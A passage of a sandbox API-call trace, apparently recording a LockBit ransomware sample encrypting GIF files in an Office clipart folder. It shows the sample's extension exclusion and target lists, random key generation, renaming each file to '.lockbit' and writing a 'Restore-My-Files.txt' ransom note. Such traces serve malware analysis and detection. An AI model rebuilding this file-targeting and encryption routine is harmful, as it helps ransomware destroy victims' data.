[0184.587] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0184.587] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02082_.GIF") returned -1 [0184.587] lstrcmpiW (lpString1="ntldr", lpString2="WB02082_.GIF") returned -1 [0184.587] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02082_.GIF") returned -1 [0184.587] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02082_.GIF") returned -1 [0184.587] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02082_.GIF") returned -1 [0184.587] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02082_.GIF") returned -1 [0184.587] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02082_.GIF") returned -1 [0184.587] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0184.587] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF") returned=".GIF" [0184.588] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0184.588] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0184.588] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0184.589] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF.lockbit") returned 85 [0184.589] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02082_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0184.590] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0184.590] malloc (_Size=0x40068) returned 0x3e70008 [0184.590] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2454) returned 1 [0184.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0184.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0184.591] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0184.595] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0184.595] malloc (_Size=0xc0) returned 0x1fa2ed8 [0184.595] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0184.596] free (_Block=0x1fa2ed8) [0184.596] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0184.596] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0184.596] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0184.596] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x90c, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02085_.GIF", cAlternateFileName="")) returned 1 [0184.596] lstrcmpiW (lpString1=".", lpString2="WB02085_.GIF") returned -1 [0184.596] lstrcmpiW (lpString1="..", lpString2="WB02085_.GIF") returned -1 [0184.596] PathFindExtensionW (pszPath="WB02085_.GIF") returned=".GIF" [0184.596] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0184.596] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0184.596] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0184.596] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0184.596] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0184.596] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0184.596] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0184.597] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0184.597] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0184.597] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0184.597] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0184.597] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0184.597] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0184.597] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0184.597] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0184.597] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0184.598] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0184.598] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02085_.GIF") returned -1 [0184.598] lstrcmpiW (lpString1="ntldr", lpString2="WB02085_.GIF") returned -1 [0184.598] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02085_.GIF") returned -1 [0184.598] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02085_.GIF") returned -1 [0184.598] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02085_.GIF") returned -1 [0184.598] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02085_.GIF") returned -1 [0184.598] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02085_.GIF") returned -1 [0184.599] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0184.599] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF") returned=".GIF" [0184.599] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.599] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.599] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0184.599] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0184.599] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0184.599] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0184.599] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0184.599] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0184.600] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0184.600] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0184.600] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0184.600] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0184.600] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0184.600] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0184.600] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0184.600] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0184.600] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF.lockbit") returned 85 [0184.600] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02085_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0185.491] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.491] malloc (_Size=0x40068) returned 0x3df0008 [0185.491] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2316) returned 1 [0185.491] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.492] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0185.492] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.492] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0185.492] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0185.494] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.494] malloc (_Size=0xc0) returned 0x1fa2ed8 [0185.495] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0185.497] free (_Block=0x1fa2ed8) [0185.497] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0185.497] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0185.497] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.497] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x581, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02097_.GIF", cAlternateFileName="")) returned 1 [0185.497] lstrcmpiW (lpString1=".", lpString2="WB02097_.GIF") returned -1 [0185.497] lstrcmpiW (lpString1="..", lpString2="WB02097_.GIF") returned -1 [0185.497] PathFindExtensionW (pszPath="WB02097_.GIF") returned=".GIF" [0185.497] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0185.497] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0185.497] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0185.497] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0185.497] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0185.498] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0185.498] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0185.498] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0185.498] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0185.498] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0185.498] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0185.498] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0185.498] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0185.498] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0185.499] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0185.499] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0185.499] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02097_.GIF") returned -1 [0185.499] lstrcmpiW (lpString1="ntldr", lpString2="WB02097_.GIF") returned -1 [0185.499] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02097_.GIF") returned -1 [0185.499] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02097_.GIF") returned -1 [0185.499] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02097_.GIF") returned -1 [0185.499] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02097_.GIF") returned -1 [0185.500] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02097_.GIF") returned -1 [0185.500] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0185.500] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF") returned=".GIF" [0185.500] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.500] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.500] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0185.500] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0185.500] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0185.500] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0185.500] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0185.500] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0185.500] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0185.500] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0185.501] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0185.501] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0185.501] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0185.501] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0185.501] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0185.501] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0185.501] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF.lockbit") returned 85 [0185.501] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02097_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0185.502] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.503] malloc (_Size=0x40068) returned 0x1ff1e60 [0185.503] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1409) returned 1 [0185.503] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0185.503] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.504] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0185.504] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0185.506] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.506] malloc (_Size=0xc0) returned 0x1fa2ed8 [0185.506] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0185.508] free (_Block=0x1fa2ed8) [0185.508] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0185.508] wsprintfW (in: 